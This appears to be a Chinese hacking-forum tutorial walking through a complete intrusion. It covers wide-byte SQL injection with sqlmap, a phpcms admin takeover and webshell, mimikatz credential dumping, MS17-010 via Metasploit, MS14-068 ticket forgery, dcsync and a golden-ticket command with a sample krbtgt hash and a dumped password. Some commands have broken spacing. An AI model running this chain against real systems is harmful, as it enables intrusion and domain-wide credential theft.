用户
搜索
  • TA的每日心情
    奋斗
    2019-6-12 09:21
  • 签到天数: 3 天

    连续签到: 1 天

    [LV.2]偶尔看看

    实习版主

    Rank: 7Rank: 7Rank: 7

    4

    主题

    13

    帖子

    197

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2016-10-20
    发表于 2019-7-1 18:13:06 23796
    从域环境搭建到域渗透(下)


       遇主站是phpcms,端口只开了80,443,后台跟phpsoo_server没检测出弱口令,没注入,没敏感文件,数据库没有开外连,想着从旁站入手,Webscan.cc查询到主站http//www.xxxx.comhttp://www.xxxx1.com存在同一台服务器下也就是旁站。打开旁站寻找注入点,1 and 1=1 1’ and ‘1’=’1’-- ,在输入%df%27时页面爆出sql出错信息,就该站存在注入,宽字符注入。
    宽字节注入原理
    当MySQL数据库统一GBK编码的时候,提交http://example.com/demp.php?id=test%df%27
    会被转译成“運” 从而将单引号闭合
    SQL查询语句为 Select username,password from user where test=’運’
    我们可以用%df把这个\给吃掉,然后在后边就可以正常注入了,当然我们也可以使用sqlmap一把梭。(sqlmap自带可以绕过的)
    接下来就是sqlmap一耙梭环节了
    1.png
    sqlmap.py -u "url"  测试是否为注入点
    sqlmap.py -u "url" --dbs 列库
    sqlmap.py -u "url"--tables -D "库名" 列出表名
    sqlmap.py -u "url"--columns -T "表名" -D "库名" 列出列名
    sqlmap.py -u "url" --dump-C "列名" -T"表名" -D "库名"dump 出数据
    2.png
    看数据库,很惊喜的发现phpcms这个库也在,于是乎dump到了管理员账号密码
    3.png
    4.png
    phpcms解密步骤
    假如密码:123123  encrypt:Jiu5He  
    第一步: md5("123456")="4297f44b13955235245b2497399d7a93";
    第二步:  第一步+encrypt="4297f44b13955235245b2497399d7a93Jiu5He"
    第三步:  md5("4297f44b13955235245b2497399d7a93Jiu5He")="fff8f80ec250d7a8536382287cee7840";  
    结果为:fff8f80ec250d7a8536382287cee7840
    从而解出账号密码 admin caixukun
    或者在https://www.somd5.com/上面直接查
    5.png
    之后我们直奔后台/phpcms/admin.php,使用得出来的账密登陆,登录成功
    6.png
    一般phpcms getshell非常简单
    在内容-专题-添加专题-上传图片位置,填写如下内容
    12.png
    点击提交
    可以在本地路径中看到生成的相关文件index.html
    \phpcms\html\special\shell
    8.png
    接下来进入 内容 > 内容相关设置 > 管理栏目 >
    9.png
    然后在模板设置-默认模板,单网页,并修改路径
    10.png
    然后提交
    11.png
    再点击内容-内容相关设置-栏目管理
    13.png
    getshell
    14.png
    查看基本信息,很明显,该服务器存在域中
    15.png
    因是普通账号,需要提权。获得win7权限,因为是测试就直接上服务器。
    (一般情况下用powershell反弹一个shell,然后通过ew代理内网穿透,再或者将shell反弹msf,在msf添加路由,再开始搞事情。)
    16.png
    该服务器存在域环境中,接下来目的就是获得域管权限
    17.png 18.png
    三、域渗透
    确定该服务器有域,什么是域?域就是将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器,域控制器中保存着整个域的用户帐号和安全数据库。
    19.png
    域的特性:
    域成员计算机在登录的时候可以选择登录到域中或此计算机,登陆到域中的时候,身份验证是采用Kerberos协议在域控制器上进行的,登陆到此计算机则是通过SAM来进行NTLM验证的。
    域渗透思路:
         域中的计算机账号密码,很可能能够登陆域中的某台计算机,然后通过域成员的机器获得域控ip以及域管理账号,而域管理员可以登录任何域成员的机器,在找到域管理员登录过的ip,从该域成员dum出域管理账号密码,拿下域控,也可通过域成员进提权
    net view 查看域中机器
    20.png
    查询域用户:net user /domain
    21.png
    查询域管理用户:net group “domainadmins” /domain
    22.png
    查询域里面的工作组:net group /domain
    23.png
    查询登录本机的域管理员:net localgroupadministrators /domain
    24.png
    获所有域成员计算机列表net group"domain computers" /domain
    25.png
    查询域内计算机dsquery computer
    查询以win开头的5台机器
    dsquery computer domainroot-name win* -limit 5
    26.png
    获得指定账户信息
    27.png
    经过简单信息收集,一般dns就是域管,现在基本知道域控是那台机器了,应该是win0801并获取到ip地址
    28.png
    利用mimikatz dump当前账户密码
    privilege::debug

    sekurlsa::logonpasswords

    29.png
    30.png
    尝试本地密码登录域管未登陆成功
    31.png
    扫描端口开放445,尝试使用ms17-010
    32.png
    打开msf
    Search ms17-010
    33.png
    USE EXP模块
    34.png
    Set RHOST 192.168.1.1
    SET RPOST 445
    35.png
    Run 运行
    成功获取win0801权限,并登陆服务器
    36.png
    37.png
    利用mimikatz抓取明文密码
    privilege::debug

    sekurlsa::logonpasswords

    38.png
    到此控就撸下了。
    若没有撸下域管理机器,可尝试域提权
    1.在域用户上提权,域提权条件
    (1)Ms14-068.exe
    (2)SID
    (3)当前账号密码
    (4)域管理名字
    SID
    39.png
    利用mimikatz来Dump域用户账号密码:
    40.png
    * Username : sunac
    * Password :ac13!@#123
    域管理名字:win0801.sun.com
    41.png
    42.png
    信息基本都全了,下一步提权,利用ms14068
    klist purge删除所有票据,不能访问域控或者其他机器
    6661.png
    6662.png

    14068.exe -u 用户 -s SID -d 域控名或ip,[url=mailto:%E6%89%A7%E8%A1%8C%E5%90%8E%E4%BC%9A%E5%9C%A8%E6%9C%AC%E7%9B%AE%E5%BD%95%E7%94%9F%E6%88%[email]90TGT_sunac@sun.com.ccache[/email]]执行后会在本目录生成[email]TGT_sunac@sun.com.ccache[/email][/url]
    45.png
    利用mimikatz伪造生成新的票据
    46.png
    查看票据 klist
    47.png
    通过现在的票据查看域管机器或者其他机器文件(例如:c盘)
    48.png
    49.png
    Dump域hash
    使用mimikatz
    lsadump::dcsync /domain:sun.com/all /csv
    dump所有用户hash
    50.png
    指定用户
    lsadump::dcsync /domain:sun.com/user:sunac
    51.png
    Cmd5.com可破解hash
    52.png
    创建金票据
    mimikatz "kerberos::golden/user:sunac /domain:sun.com /sid:S-1-5-21-3259697498-2397402776-2651643352-1108/krbtgt:1f3825a0cda62e7eeaa66b5936ad40fc /ptt" exit
    Krbtgt:krbtgt的hash
    User:当前用户
    Sid:当前用户sid
    53.png
    54.png
    查看当前票据
    55.png
    票据伪造完成
    56.png
    57.png
    58.png
    接下来就可以为所欲为。
    只是写了一些简单的东西,大佬飘过,嘿嘿。


    44.png
    43.png
    7.png
    发表于 2019-7-1 18:57:19
    谢谢分享  
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    真的是看的我一愣一愣的,从来没想过拿这种服务器,有思路了
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册